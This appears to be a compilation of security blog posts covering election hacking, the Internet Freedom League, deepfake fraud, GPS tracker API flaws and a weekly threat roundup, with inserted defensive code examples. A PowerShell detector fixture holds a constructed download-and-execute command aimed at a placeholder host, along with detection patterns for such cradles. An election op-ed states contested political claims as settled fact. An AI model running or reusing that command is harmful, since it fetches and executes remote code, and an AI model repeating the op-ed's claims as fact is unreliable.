After railing against previous findings of DefCon participants, Election Systems and Software (ES&S) CEO Tom Burt reversed his position in a Roll Call op-ed that called for paper records and mandatory machine testing in order to secure e-voting systems. It’s a welcome move as far as cybersecurity experts are concerned.

After a midterm election featuring irregularities in Georgia, North Carolina and other smaller hacks, and warnings from the likes of Special Prosecutor Robert Mueller, there has been no meaningful action nationwide when it comes to election security, while the specter of serious interference remains. Senate Majority Leader Mitch McConnell (R-Ky.) has steadfastly refused to allow even bi-partisan election security legislation to come to the floor for a vote, much less a debate, and for that reason he and the Republican party are blameworthy for placing politics above protecting our most cherished democratic right.

While the news is on overheated cycles covering every tweet, or sound bite, uttered by President Trump, critical issues like cybersecurity are not being addressed, and this matters — given recent DefCon news of election machines connected to the internet when they shouldn’t be, and the persistent threat of state-sponsored attacks on our democracy.

Think DARPA’s $10 million un-hackable election machine proves all is well? Not quite. Bugs during the setup of the DARPA wonder machine meant that DefCon’s participants didn’t have enough time to properly break the thing. In the absence of definitive proof to the contrary, we have to assume it can be hacked.

What Now?

Instead of discussing the nation’s Voter ID laws, we need to focus on securing the vote.

It is well-established fact that Russia attempted to interfere in the 2016 election in all 50 states, and Israel — an ally of the president — recently disclosed that the Russian government identified President Trump as the candidate most likely to benefit Russia, and used cyberbots to help him win. The fact that President Trump won the election on the strength of just 80,000 votes spread across three key swing states shows how important it is to address the issue. We’re not talking about a blunderbuss approach to hacking the election here. Plausible outcomes can be constructed. It’s been known to happen before.

Some experts think it may soon be too late to secure 2020 against the threat of state-sponsored hacks. I do not. But I think the time to delay to score political points has passed, and now is the time for action.

The post Prediction: 2020 election is set to be hacked, if we don’t act fast appeared first on Adam Levin.

Five Thoughts on the Internet Freedom League

In the September/October issue of Foreign Affairs magazine, Richard Clarke and Rob Knake published an article titled "The Internet Freedom League: How to Push Back Against the Authoritarian Assault on the Web," based on their recent book The Fifth Domain. The article proposes the following:

The United States and its allies and partners should stop worrying about the risk of authoritarians splitting the Internet. 

Instead, they should split it themselves, by creating a digital bloc within which data, services, and products can flow freely, excluding countries that do not respect freedom of expression or privacy rights, engage in disruptive activity, or provide safe havens to cybercriminals...

The league would not raise a digital Iron Curtain; at least initially, most Internet traffic would still flow between members and nonmembers, and the league would primarily block companies and organizations that aid and abet cybercrime, rather than entire countries. 

Governments that fundamentally accept the idea of an open, tolerant, and democratic Internet but that struggle to live up to such a vision would have an incentive to improve their enforcement efforts in order to join the league and secure connectivity for their companies and citizens. 

Of course, authoritarian regimes in China, Russia, and elsewhere will probably continue to reject that vision. 

Instead of begging and pleading with such governments to play nice, from now on, the United States and its allies should lay down the law: follow the rules, or get cut off.

My initial reaction to this line of thought was not encouraging. Rather than continue exchanging Twitter messages, Rob and I had a very pleasant phone conversation to help each other understand our points of view. Rob asked me to document my thoughts in a blog post, so this is the result.

Rob explained that the main goal of the IFL is to create leverage to influence those who do not implement an open, tolerant, and democratic Internet (summarized below as OTDI). I agree that leverage is certainly lacking, but I wondered if the IFL would accomplish that goal. My reservations included the following.

1. Many countries that currently reject the OTDI might only be too happy to be cut off from the Western Internet. These countries do not want their citizens accessing the OTDI. Currently dissidents and others seeking news beyond their local borders must often use virtual private networks and other means to access the OTDI. If the IFL went live, those dissidents and others would be cut off, thanks to their government's resistance to OTDI principles.

2. Elites in anti-OTDI countries would still find ways to access the Western Internet, either for personal, business, political, military, or intelligence reasons. The common person would be most likely to suffer.

3. Segregating the OTDI would increase the incentives for "network traffic smuggling," whereby anti-OTDI elites would compromise, bribe, or otherwise corrupt Western Internet resources to establish surreptitious methods to access the OTDI. This would increase the intrusion pressure upon organizations with networks in OTDI and anti-OTDI locations.

4. Privacy and Internet freedom groups would likely strongly reject the idea of segregating the Internet in this manner. They are vocal and would apply heavy political pressure, similar to recent net neutrality arguments.

5. It might not be technically possible to segregate the Internet as desired by the IFL. Global business does not neatly differentiate between Western and anti-OTDI networks. Similar to the expected resistance from privacy and freedom groups, I expect global commercial lobbies to strongly reject the IFL on two grounds. First, global businesses cannot disentangle themselves from anti-OTDI locations, and second, Western businesses do not want to lose access to markets in anti-OTDI countries.

Rob and I had a wide-ranging discussion, but these five points in written form provide a platform for further analysis.

What do you think about the IFL? Let Rob and me know on Twitter, via @robknake and @taosecurity.

Weekly Update 156

Turns out it's actually a sunny day in Oslo today, although it's the last one I'll see here for quite some time before heading off to Denmark then other European things for the remainder of this trip. I'm talking a little about those events (all listed on my events page), this week's changes to EV, more data breaches and a somewhat semantic argument about the definition of "theft".

References

  1. Entrust are convinced you should still pay them for EV certs (even though the primary value proposition they're still promoting is now gone...)
  2. Scott killed a million bucks worth of EV certs (it turns out that extended validation isn't always so... extended)
  3. The Void.to hacking forum got breached and is now in HIBP (a lot of private messages in there people really wouldn't want being traced back to them)
  4. Garmin in South Africa had a whole bunch of credit cards siphoned off (looks like a classic Magecart attack)
  5. Does a data breach actually constitute "theft" given the original owner isn't deprived of it? (that's a link to the Twitter thread on it, I think the term is a bit overloaded TBH)
  6. Sponsored by Okta: You wouldn’t roll your own hashing algorithm, so why build your own auth? Secure users in mins with a free dev account.

How Deepfakes Can Ruin Your Business

Worldwide concern is increasing over the adverse effects that deepfakes could have on society, and for good reason. Recently, the employee of an energy company based in the UK was tricked into thinking he was talking on the phone with his boss, the CEO of the German parent company, who asked him to transfer $243,000 to a Hungarian supplier. Of course, the employee was not speaking with the actual CEO, but with a scammer who was impersonating the real CEO through voice-altering AI.

This kind of social engineering attack is not new. In fact, merely two months ago, cybersecurity researchers identified three successful deepfake audio attacks on companies. Their “CEO” called a financial officer to ask for an urgent money transfer. The voices of the real CEO had been taken from earnings calls, YouTube videos, TED talks, and other recordings, and inserted into an AI program which enabled fraudsters to imitate the voices.

These types of incidents are the audio version of what are known as deepfake videos, which have been causing global panic for the past couple of years. As we become accustomed to the existence of deepfakes, this may affect our trust in any videos we see or audio footage we hear, including the real ones. Videos, which once used to be the ultimate form of truth that transcended edited pictures that can be easily altered, can now deceive us as well.

And this brings us to the question:

How safe is your business in the face of the deepfake threat?

What are Deepfakes?

Deepfakes are fake video and audio footage of individuals, that are meant to make them look like they have said and done things which, in fact, they haven’t. “Deep” relates to the “deep learning” technology used to produce the media and “fake” to its artificial nature. Most of the time, the faces of people are superimposed on the bodies of others, or their actual figure is altered in such a way that it appears to be saying and doing something that they never did.

The term was born in 2017 when a Reddit user posted a fake adult video showing the faces of some Hollywood celebrities. Later, the user also published the machine learning code used to create the video.

Can we detect and stop Deepfakes?

Right now, researchers and companies are investigating how they can utilize AI to distinguish and wipe out deepfakes. New advancements have started to rise that are meant to help us identify which pictures and recordings are real and which are fake.

For example, Facebook, Microsoft, the Partnership on AI coalition, and academics from several universities are launching a contest to help improve the detection of deepfakes. They aim to encourage people to produce a technology that can be used by anyone to detect when deepfake material has been created. The Deepfake Detection Challenge will feature a data set and leaderboard, alongside grants and awards, to motivate participants to design new methods of identifying and stopping fake footage meant to deceive others.

Yet, this won’t prevent the fake media from being created, shared, seen and heard by millions of people before it is removed. And without doubt, it can be extremely difficult to face the consequences and repair the damage once malicious materials get distributed.

How can you spot Deepfake videos?

Until some highly reliable technical solutions are designed, we should learn to identify the tell-tale signs of deepfakes. So, here are the flaws you should be looking for:

  • Blinking – According to research, eye blinking is often poorly reproduced in deepfake videos; the subject may blink rarely or unnaturally.
  • Head position – Watch out for blurry face borders that subtly blend into the background.
  • Artificially-looking skin – If the face looks extra smooth like it’s been edited, this may be another warning sign. Also, watch out for the skin tone that can be slightly different than the rest of the body.
  • Slow speech and different intonation – Sometimes, you will notice the one who is being impersonated talks rather slowly or there isn’t quite a match between the real person’s voice and the fake one.
  • An overall strange look and feel – In the end, you should trust your instinct. Sometimes, you can simply tell something’s not right.

At the moment, one can easily spot deepfakes. But in the future, as this technology progresses, it will gradually become more difficult.
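As an added illustration of the "Blinking" sign in the list above (this is example code written for this page, not code from Heimdal Security or from any deepfake-detection project), the block below counts blinks in a per-frame eye-aspect-ratio (EAR) series and flags clips whose blink rate is implausibly low. It assumes the EAR values come from a facial-landmark detector run on every frame; here they are constructed so the code runs offline, and the thresholds are assumed values, not research results.

```python
# Added example (not from the original post): a blink-rate heuristic over a
# per-frame eye aspect ratio (EAR) series, in the spirit of the "Blinking" sign.
# ASSUMPTION: EAR values come from a facial-landmark detector run on each frame;
# here they are constructed so the code runs offline.
from typing import List

EAR_CLOSED = 0.21            # assumed threshold: below this the eye counts as closed
MIN_CLOSED_FRAMES = 2        # a blink must last at least this many consecutive frames
MIN_BLINKS_PER_MINUTE = 6.0  # assumed floor; adults normally blink well above this


def count_blinks(ear: List[float]) -> int:
    """Count closed-eye runs of at least MIN_CLOSED_FRAMES frames.

    Single-frame dips (landmark jitter) are ignored so that detector noise is
    not mistaken for blinking."""
    blinks = 0
    closed_run = 0
    for value in ear:
        if value < EAR_CLOSED:
            closed_run += 1
            continue
        if closed_run >= MIN_CLOSED_FRAMES:
            blinks += 1
        closed_run = 0
    if closed_run >= MIN_CLOSED_FRAMES:   # clip ended with the eye closed
        blinks += 1
    return blinks


def blink_rate_per_minute(ear: List[float], fps: float) -> float:
    seconds = len(ear) / fps
    return count_blinks(ear) * 60.0 / seconds if seconds else 0.0


def low_blink_rate(ear: List[float], fps: float) -> bool:
    """True when the clip blinks less than a plausible human would.

    This is one weak signal, not a verdict: a real speaker reading from a
    teleprompter can also score low, and better forgeries blink normally."""
    return blink_rate_per_minute(ear, fps) < MIN_BLINKS_PER_MINUTE


def constructed_clip(fps: int, seconds: int, blinks: int) -> List[float]:
    """Build a constructed EAR series: open eyes (0.30) with `blinks` evenly
    spaced three-frame closures (0.15)."""
    n = fps * seconds
    series = [0.30] * n
    if blinks:
        spacing = n // blinks
        for i in range(blinks):
            start = i * spacing + spacing // 2
            for frame in range(start, min(start + 3, n)):
                series[frame] = 0.15
    return series


if __name__ == "__main__":
    for label, clip in (("natural", constructed_clip(30, 60, 15)),
                        ("suspicious", constructed_clip(30, 60, 1))):
        print(label, round(blink_rate_per_minute(clip, 30), 1), low_blink_rate(clip, 30))
```

Treat the result as one input to a human review, not as proof of forgery: the value of the heuristic is that it is cheap to compute on every clip, and its weakness is that it says nothing about a forgery whose blinking looks normal.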

Deepfakes could destroy everything

Here is what deepfakes could have a highly negative impact on:

#1. Politics

Deepfakes could influence elections since they can put words into politicians’ mouths and make them look like they’ve done or said certain things which, in fact, they haven’t. Deepfake producers could target popular social media channels, where the content shared can instantly become viral.

#2. Justice

Fake evidence for criminal trials could be used against people in court and this way, they could become accused of crimes they did not commit. Thus, the wrong people could go to jail. And on the other hand, people who are guilty could be set free based on false proof.

#3. Stock market

Deepfakes could be used to manipulate stock prices when altered footage of influential people making certain statements gets distributed. Imagine what would happen if a fake video surfaced of the CEO of a company such as Apple, Amazon, or Google declaring they had done something illegal. For instance, back in 2008, Apple’s stock dropped 10 points after a false rumor emerged that Steve Jobs had suffered a major heart attack.

#4. Online bullying

The deepfake technology could also be used to amplify cyberbullying, especially since it’s now becoming widely available. People can easily turn into victims when manipulated media of them is posted online. Or they can get blackmailed by cybercriminals who are threatening to leak the footage if, for instance, they don’t pay a certain amount of money.

#5. Companies

Someone could be making false statements about your business to destabilize and degrade it. Malicious actors could make it look like you or someone within your organization admitting to having been involved in consumer fraud, bribery, sexual abuse, and any other wrongdoings you can think of. Obviously, these kinds of false statements can destroy your company’s reputation and make it difficult for you to prove otherwise.

What can be done?

Due to the current gaps in the law, producers of deepfakes are not criminally liable. However, the Deepfakes Accountability Act (the “Defending Each and Every Person from False Appearances by Keeping Exploitation Subject to Accountability Act” – yes, you’ve correctly identified an acronym right there) aims to take measures to criminalize this type of fake media.

In short, anyone who creates deepfakes would be required to reveal that the footage is altered. And if they fail to do so, it will be considered a crime. The existence of these kinds of regulations is mandatory to protect deepfake victims and also the general public from distorted information.

How can you protect your business from Deepfakes?

Your competitors could resort to deepfake blackmail in order to try to eliminate you from the industry.

No matter how good technological deepfake detection solutions become, they won’t prevent manipulated media from being shared and reaching large numbers of people. So, the best approach is to teach your employees how to identify fake footage and to question anything that seems suspicious inside the organization.

#1. Train your employees

The topic of deepfakes can be looked at during your cybersecurity training. For instance, if they receive an unexpected call from the CEO who is asking them to transfer $1 million to a bank account, they could, first of all, question if the person on the other line is who they say they are. Maybe, a good countermeasure would be to have a few security questions in place that need to be asked to verify a caller’s identity.
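The control that defeats the phone-call scenario described at the top of this article is procedural: a callback on a number taken from the staff directory (never one offered by the caller) and a second approver above a certain amount. The block below is an added example of that gate as code, written for this page rather than taken from Heimdal Security or any finance system; the directory entries, the thresholds and the `TransferRequest` shape are constructed assumptions, and a real deployment would take them from the ERP and HR systems.

```python
# Added example (not from the original post): a policy gate for urgent transfer
# requests that arrive by phone or email. ASSUMPTIONS: the directory, the
# thresholds and the TransferRequest shape are constructed for this example.
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Constructed staff directory: the ONLY source of callback numbers. A number
# offered by the caller ("ring me back on my mobile") is never used.
DIRECTORY: Dict[str, str] = {
    "ceo@example.com": "+44-20-0000-0001",
    "cfo@example.com": "+44-20-0000-0002",
    "controller@example.com": "+44-20-0000-0003",
    "treasury@example.com": "+44-20-0000-0004",
}
CALLBACK_THRESHOLD = 10_000.0        # assumed: above this, call back on the directory number
DUAL_APPROVAL_THRESHOLD = 50_000.0   # assumed: above this, two approvers besides the requester
UNVERIFIED_CHANNELS = {"phone", "email"}   # channels where the sender can be faked


@dataclass
class TransferRequest:
    claimed_sender: str
    amount: float
    channel: str                                    # "phone", "email", "ticket", ...
    callback_number_offered: Optional[str] = None   # number the caller asked to be reached on
    callback_confirmed_on: Optional[str] = None     # number finance actually reached them on
    approvers: Set[str] = field(default_factory=set)


def evaluate(req: TransferRequest) -> Tuple[str, List[str]]:
    """Return ("approve" | "hold" | "deny", reasons).

    "hold" means a required step is still outstanding; "deny" means a step was
    done in a way that defeats its purpose."""
    reasons: List[str] = []
    expected = DIRECTORY.get(req.claimed_sender)
    if expected is None:
        return "deny", ["claimed sender is not in the staff directory"]

    needs_callback = req.channel in UNVERIFIED_CHANNELS and req.amount >= CALLBACK_THRESHOLD
    if needs_callback:
        if req.callback_confirmed_on is None:
            reasons.append(f"call back {req.claimed_sender} on the directory number before paying")
        elif req.callback_confirmed_on != expected:
            # The classic trick: the fraudster supplies the callback number,
            # so a callback to that number proves nothing.
            return "deny", ["callback went to a number that is not the directory number"]

    if req.amount >= DUAL_APPROVAL_THRESHOLD:
        independent = {a for a in req.approvers
                       if a != req.claimed_sender and a in DIRECTORY}
        if len(independent) < 2:
            reasons.append("two approvers other than the requester are required")

    return ("hold" if reasons else "approve"), reasons


if __name__ == "__main__":
    # Constructed walk-through of an urgent "CEO" phone request.
    req = TransferRequest("ceo@example.com", 243_000.0, "phone",
                          callback_number_offered="+36-1-000-0000")
    print(evaluate(req))                                   # hold: callback outstanding
    req.callback_confirmed_on = "+36-1-000-0000"
    print(evaluate(req))                                   # deny: wrong number
    req.callback_confirmed_on = DIRECTORY["ceo@example.com"]
    req.approvers = {"cfo@example.com", "controller@example.com"}
    print(evaluate(req))                                   # approve
```

The design point is that urgency and a convincing voice change nothing in this flow: the decision depends only on facts the finance team establishes itself, the directory number and the second approver, which a voice clone cannot supply.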

#2. Monitor your brand’s online presence

Your brand’s presence is probably already being monitored online. So, make sure your designated people keep an eye on fake content involving your organization and if anything suspicious is brought to light, they do their best to take it down as soon as possible and mitigate the damage.

This brings us to the next point.

#3. Be transparent

If you become a victim of deepfakes, ensure that your audience is aware of the targeted attack. Trying to ignore what happened or assume that people didn’t believe what they’ve seen or heard won’t make the issue disappear. Therefore, your PR efforts should be centered around communicating that someone from your company has been impersonated and highlighting the artificial nature of the distributed footage.

Never let misinformation erode your public’s confidence!

Wrapping it all up

The dangers of deepfakes are real and should not be underestimated. A single ill-intended rumor could destroy your business. So you, both as an individual and as an organization, should be prepared to stand against these threats.

The post How Deepfakes Can Ruin Your Business appeared first on Heimdal Security Blog.

#44CON: GPS Trackers Hacked to Make Premium Rate Calls

Speaking at 44CON, Pen Test Partners researchers Tony Gee and Vangelis Stykas demonstrated vulnerabilities in GPS trackers, which enabled them to call premium rate phone numbers, and possibly influence the outcome of television talent shows.

Gee said that there is demand for GPS trackers, which are used in watches for kids, cars and even on pets’ collars, but their research had found consistent API vulnerabilities. Gee said that the problems were in “a lot of common APIs and used across platforms” in IoT products that were available cheaply.

Stykas called one product range “a monstrosity,” saying that the research into Thinkrace technology found that most API calls did not require authentication, and all users start with the default password “123456.” There were at least 370 vulnerable devices, across 80 domains on 40 different servers, which Stykas said allows anyone to be tracked, with a hacker able to change the email and take over the device, and force a firmware update. 

Calling it a “classic horizontal escalation of privilege,” Stykas said that the vendor had not responded to vulnerability disclosures for three years “on multiple attempts.”

In further research, Gee said that a lot of the GPS devices, particularly tracker watches for kids, used a pay-as-you-go SIM card, and allowed for a premium rate phone line to be called. “If we own the number, we make the money,” he said, pointing out that the costs of setting up a number only runs into hundreds of pounds, but regulation by the PSA was strong on doing this.

Looking at the options of hacking a GPS tracker to enable text voting to a premium line, Gee said that a typical SMS vote is 35p, so with a £10 top up you could vote 28 times. If there are 25 million vulnerable devices, that can enable seven billion votes. While he admitted that the voting at the annual Eurovision song contest could not be influenced because of the jury system, it was possible to influence talent shows like X Factor and Britain’s Got Talent. This would also allow the attacker to gamble on who the winner would be.

Talking on the disclosure, Gee said that the UK’s main four providers (o2, Vodafone, EE and 3) have a default “on” for premium lines to be called. Meanwhile, the vendors have been notified but “most products are not fixed and multiple devices have the same flaws.” However, the PSA have responded and said that Pen Test Partners will be invited to review changes.

Gee concluded by saying that most trackers will not be fixed, but manufacturers “need to get better” as “authentication is not authorization.”
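The "authentication is not authorization" point, and the unauthenticated API calls and default password the talk describes, can be made concrete with a small in-memory model. The block below is an added example written for this page; it is not Pen Test Partners' code or any vendor's API. It keeps the unauthenticated lookup for contrast beside a handler that checks both a valid session and device ownership, and refuses logins that are still on the factory default. Device ids, accounts and locations are constructed.

```python
# Added example (not Pen Test Partners' code or any vendor's): a minimal
# in-memory model of a tracker API. The unauthenticated lookup mirrors the
# pattern described in the talk; the hardened path checks authentication AND
# ownership. Users, device ids and locations are constructed.
import secrets
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

DEFAULT_PASSWORDS = {"123456"}   # the factory default mentioned in the talk
MIN_PASSWORD_LENGTH = 12         # assumed policy value


@dataclass
class Device:
    owner: str                      # account email
    location: Tuple[float, float]   # (lat, lon), constructed


class TrackerAPI:
    def __init__(self) -> None:
        self.passwords: Dict[str, str] = {}   # email -> password (plain text only to keep the model short)
        self.devices: Dict[int, Device] = {}
        self.sessions: Dict[str, str] = {}    # token -> email

    # --- accounts ---------------------------------------------------------
    def add_user(self, email: str, password: str) -> None:
        self.passwords[email] = password

    def change_password(self, email: str, old: str, new: str) -> bool:
        if self.passwords.get(email) != old:
            return False
        if new in DEFAULT_PASSWORDS or len(new) < MIN_PASSWORD_LENGTH:
            return False
        self.passwords[email] = new
        return True

    def login(self, email: str, password: str) -> Optional[str]:
        """Return a session token, or None. Accounts still on the factory
        default are refused until the password is changed."""
        if self.passwords.get(email) != password or password in DEFAULT_PASSWORDS:
            return None
        token = secrets.token_urlsafe(32)
        self.sessions[token] = email
        return token

    # --- the pattern the talk describes: no authentication, no ownership ---
    def location_unauthenticated(self, device_id: int) -> Tuple[float, float]:
        return self.devices[device_id].location

    # --- hardened: authenticated AND authorized -----------------------------
    def _owned_device(self, token: Optional[str], device_id: int) -> Device:
        email = self.sessions.get(token or "")
        if email is None:
            raise PermissionError("not authenticated")
        device = self.devices.get(device_id)
        # Same error for "no such device" and "someone else's device", so the
        # response does not reveal which ids exist.
        if device is None or device.owner != email:
            raise PermissionError("not authorized for this device")
        return device

    def location(self, token: Optional[str], device_id: int) -> Tuple[float, float]:
        return self._owned_device(token, device_id).location

    def transfer_ownership(self, token: Optional[str], device_id: int, new_owner: str) -> None:
        """The account-takeover path in the talk; here it requires ownership
        and an existing account to hand over to."""
        device = self._owned_device(token, device_id)
        if new_owner not in self.passwords:
            raise ValueError("unknown account")
        device.owner = new_owner


def can_read(api: TrackerAPI, token: Optional[str], device_id: int) -> bool:
    try:
        api.location(token, device_id)
        return True
    except PermissionError:
        return False


def build_demo() -> TrackerAPI:
    """Constructed fixture: two accounts, two devices, one account still on the default."""
    api = TrackerAPI()
    api.add_user("alice@example.com", "123456")
    api.add_user("bob@example.com", "correct-horse-battery-staple")
    api.devices[1001] = Device("alice@example.com", (51.50, -0.12))
    api.devices[1002] = Device("bob@example.com", (53.40, -2.98))
    return api
```

Note that the hardened `_owned_device` check is the single place where authorization is decided; every handler that touches a device goes through it, which is what prevents the horizontal escalation Stykas describes, where a valid login for one account is enough to reach every other account's device.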

This Week in Security News: IoT Devices Are a Target in Cybercriminal Underground

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn how fileless malware abuses PowerShell. Also, read how Trend Micro researchers are pulling back the curtain on the cybercriminal underground to warn consumers and businesses about potential threats against IoT devices.

Read on:

Are IoT Threats Discussed In The Cybercriminal Underground?

Trend Micro researchers from around the globe monitored five different cybercriminal undergrounds and, given the amount of chatter, found that there is no doubt that IoT devices, mainly routers, are certainly a target.

From BinDiff to Zero-Day: A Proof of Concept Exploiting CVE-2019-1208 in Internet Explorer

Researchers share a proof of concept showing how a use-after-free vulnerability in Internet Explorer can be fully and consistently exploited in Windows 10 RS5. The flaw was discovered through BinDiff and addressed in Microsoft’s September Patch Tuesday.

‘Purple Fox’ Fileless Malware with Rootkit Component Delivered by Rig Exploit Kit Now Abuses PowerShell

The newest iteration of Purple Fox that researchers came across, being delivered by Rig, retains its rootkit component by abusing publicly available code and now eschews its use of NSIS in favor of abusing PowerShell, making Purple Fox capable of fileless infection. This blog discusses features of this malware and security recommendations to avoid these types of threats.
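Fileless PowerShell delivery of the kind described for Purple Fox leaves its trace in process-creation telemetry rather than on disk, so that is where a detection engineer looks. The block below is an added example, not Trend Micro's code: it scans constructed process-creation log lines in a simple `key="value"` format, flags PowerShell launches that combine the usual evasion switches, and decodes an `-EncodedCommand` payload so the analyst can see what was run. The field names `Image`, `ParentImage` and `CommandLine` follow Sysmon event 1 naming as an assumption; the sample lines and the encoded payload are constructed.

```python
# Added example (not Trend Micro's code): detection logic for PowerShell abuse
# in process-creation logs. ASSUMPTION: lines use key="value" fields named as in
# Sysmon event 1 (Image, ParentImage, CommandLine). Samples are constructed.
import base64
import re
from typing import Dict, List, Optional

INDICATORS = [
    (r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", "base64-encoded command"),
    (r"-nop\b|-noprofile\b", "profile suppressed"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-(?:ep|executionpolicy)\s+bypass", "execution policy bypass"),
    (r"\biex\b|invoke-expression", "in-memory invocation"),
    (r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", "remote download"),
]


def parse_line(line: str) -> Dict[str, str]:
    """Parse key="value" pairs; values may contain spaces but not quotes."""
    return dict(re.findall(r'(\w+)="([^"]*)"', line))


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """PowerShell -EncodedCommand carries base64 of UTF-16LE text."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(line: str) -> Optional[dict]:
    """Return a finding for a suspicious PowerShell launch, else None."""
    fields = parse_line(line)
    image = fields.get("Image", "").lower()
    if not (image.endswith("powershell.exe") or image.endswith("pwsh.exe")):
        return None
    cmd = fields.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    text = cmd + " " + (decoded or "")      # scan the decoded payload as well
    hits = [label for pattern, label in INDICATORS if re.search(pattern, text, re.I)]
    if not hits:
        return None
    return {"parent": fields.get("ParentImage"), "indicators": hits, "decoded": decoded}


def scan(lines: List[str]) -> List[dict]:
    return [finding for finding in map(analyze, lines) if finding]


# Constructed payload and log lines (no real host, URL or sample involved).
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://stage.invalid/s.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOG = [
    rf'ParentImage="C:\Windows\explorer.exe" Image="{PS}" '
    r'CommandLine="powershell.exe -File C:\Scripts\nightly-backup.ps1"',
    rf'ParentImage="C:\Program Files\Internet Explorer\iexplore.exe" Image="{PS}" '
    rf'CommandLine="powershell.exe -nop -w hidden -ep bypass -enc {ENCODED}"',
    r'ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\notepad.exe" '
    r'CommandLine="notepad.exe notes.txt"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["parent"], finding["indicators"])
        print("  decoded:", finding["decoded"])
```

The benign backup script is not flagged because none of the evasion switches appear; the second line is flagged on the switches alone, and decoding the payload adds the in-memory invocation and download indicators, which is the combination an analyst would escalate when the parent is a browser, as in a Rig delivery.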

Trend Micro Security’s Family of 2020 Releases Provide Enhanced Protections for PCs, Macs, Mobile Devices, and Home Networks

Trend Micro ensures its family of products is progressively enhanced to meet the needs of consumers and the Trend Micro Security 2020 Fall Release is no exception. Endpoint and network security products are improved to provide the most advanced protections from persistent, new, and emerging threats.

Smart Cities Will Require Smarter Cybersecurity

As cities become smarter, officials and security experts say that current defenses are unlikely to keep hackers at bay. Ideas for making cyber defenses smarter include reducing reliance on passwords and open-sourcing security standards to benefit from the perspective of a wider range of security professionals.

September Patch Tuesday Bears More Remote Desktop Vulnerability Fixes and Two Zero-Days

Continuing the trend from last month, several critical patches were for Remote Desktop Clients – all Remote Code Execution (RCE) vulnerabilities. Microsoft also patched two zero-days which are both elevation of privilege vulnerabilities.

Cybersecurity: 99% of email attacks rely on victims clicking links

Social engineering is by far the biggest factor in malicious hacking campaigns and nearly all successful email-based cyberattacks require the target to open files, click on links, or carry out some other action. While many of these attacks are designed to look highly legitimate, there are ways to identify what could potentially be a malicious attack.

Business Roundtable calls on Congress to pass consumer data privacy law

CEOs of 51 companies from the Business Roundtable, including Amazon, IBM and Salesforce, signed a letter to U.S. congressional leaders urging them to create a comprehensive consumer data privacy law.

Wikipedia Gets $2.5M Donation to Boost Cybersecurity

Wikipedia confirmed that it was hit by a malicious DDoS attack that took it offline across many countries. Following the attack, the Wikipedia Foundation received a $2.5M donation from Craigslist founder, Craig Newmark, to further expand security programs.

Ransomware attack on Premier Family Medical reportedly impacts records of 320K patients

The medical provider noted that the malware restricted employees’ access to its systems and data and has officially revealed the approximate number of affected patients in a disclosure to the federal government.

IoT Security: Now dark web hackers are targeting internet-connected gas pumps

Cyber criminals are increasingly turning their attention to hacking Internet of Things devices as connected products proliferate. While routers remain the top target for IoT-based cyberattacks, there’s a lot of discussion in underground forums about compromising internet-connected gas pumps.

Enhanced Trend Micro Security protects inboxes from scams and phishing attacks

Trend Micro announced the latest version of its flagship consumer offering, Trend Micro Security, which features enhanced protection from web threats and a new AI-powered Fraud Buster tool to protect Gmail and Outlook inboxes across the globe.

Texas Municipalities Hit by REvil/Sodinokibi Paid No Ransom, Over Half Resume Operations

Cybercriminals who held to ransom the files of 22 Texas local government units for a combined ransom amount of US$2.5 million did not get a single cent thanks to a coordinated state and federal cyber response plan.

Are you well-versed on Trend’s suggestions for protecting your routers and other devices from malware? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

Trivia! 5 things you never imagined could be hacked by cyber criminals

The term “hacking” has become the talk of the town, with one new incidence of hacking being reported every single day. The internet is in for a spin as cases of hacking are getting reported on a global level, triggering the realization that anything and everything with a vulnerable spot…

Thoughtful Design in the Age of Cybersecurity AI

Reading Time: ~ 3 min.

AI and machine learning offer tremendous promise for humanity in terms of helping us make sense of Big Data. But, while the processing power of these tools is integral for understanding trends and predicting threats, it’s not sufficient on its own.

Thoughtful design of threat intelligence—design that accounts for the ultimate needs of its consumers—is essential too. There are three areas where thoughtful design of AI for cybersecurity increases overall utility for its end users.

Designing where your data comes from

To set the process of machine learning in motion, data scientists rely on robust data sets they can use to train models that deduce patterns. If your data is siloed, relies on a single community of endpoints, or is made up only of data gathered from sensors like honeypots and crawlers, there are bound to be gaps in the resultant threat intelligence.

A diverse set of real-world endpoints is essential to achieve actionable threat intelligence. For one thing, machine learning models can be prone to picking up biases if exposed to either too much of a particular threat or too narrow of a user base. That may make the model adept at discovering one type of threat, but not so great at noticing others. Well-rounded, globally-sourced data provides the most accurate picture of threat trends.

Another significant reason real-world endpoints are essential is that some malware excels at evading traditional crawling mechanisms. This is especially common for phishing sites targeting specific geos or user environments, as well as for malware executables. Phishing sites can hide their malicious content from crawlers, and malware can appear benign or sit on a user’s endpoint for extended periods of time without taking an action.

Designing how to illustrate data’s context

Historical trends help to gauge future measurements, so designing threat intelligence that accounts for context is essential. Take a major website like www.google.com for example. Historical threat intelligence signals it’s been benign for years, leading to the conclusion that its owners have put solid security practices in place and are committed to not letting it become a vector for bad actors. On the other hand, if we look at a domain that was only very recently registered or has a long history of presenting a threat, there’s a greater chance it will behave negatively in the future. 

Illustrating this type of information in a useful way can take the form of a reputation score. Since predictions about a data object’s future actions—whether it be a URL, file, or mobile app—are based on probability, reputation scores can help determine the probability that an object may become a future threat, helping organizations determine the level of risk they are comfortable with and set their policies accordingly.
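One way to turn the context described above (registration age plus benign and malicious history) into a reputation score and a policy decision, as an added example that is not Webroot's model or code; the weights, thresholds and sample domains are assumptions constructed for illustration:

```python
from dataclasses import dataclass
from datetime import date

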